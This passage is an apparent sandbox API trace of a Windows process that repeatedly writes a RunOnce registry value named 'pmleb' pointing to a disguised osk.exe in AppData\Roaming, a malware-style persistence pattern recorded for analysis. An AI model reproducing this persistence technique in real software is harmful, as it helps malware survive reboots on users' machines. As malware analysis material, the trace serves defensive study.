_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.363] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.364] RegCloseKey (hKey=0x280) returned 0x0 [0081.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.364] SetTimer (hWnd=0x20280, nIDEvent=0x20ad, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ad [0081.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.376] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.376] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.376] KillTimer (hWnd=0x20280, uIDEvent=0x20ad) returned 1 [0081.376] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.376] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.376] IUnknown:Release (This=0x787518) returned 0x1 [0081.376] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.376] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.377] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.377] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.377] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.377] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0081.377] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.377] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x33 [0081.377] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.378] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x32 [0081.378] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.378] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.379] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.379] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.379] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.379] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.379] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.379] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.379] RegCloseKey (hKey=0x280) returned 0x0 [0081.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.380] SetTimer (hWnd=0x20280, nIDEvent=0x20ae, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ae [0081.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.391] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.391] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.391] KillTimer (hWnd=0x20280, uIDEvent=0x20ae) returned 1 [0081.391] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.391] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.391] IUnknown:Release (This=0x787518) returned 0x1 [0081.391] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.391] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.392] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.392] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.392] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.392] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0081.392] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.392] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x34 [0081.392] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.393] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x33 [0081.393] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.393] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.393] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.394] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.394] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.394] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.394] RegCloseKey (hKey=0x280) returned 0x0 [0081.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.395] SetTimer (hWnd=0x20280, nIDEvent=0x20af, uElapse=0xa, lpTimerFunc=0x0) returned 0x20af [0081.395] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.406] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.406] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.407] KillTimer (hWnd=0x20280, uIDEvent=0x20af) returned 1 [0081.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.407] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0081.407] IUnknown:Release (This=0x787518) returned 0x1 [0081.407] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.407] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.407] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.407] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.408] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.408] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0081.408] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.408] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x35 [0081.408] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.409] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x34 [0081.409] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.409] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.409] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.409] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.409] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.409] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 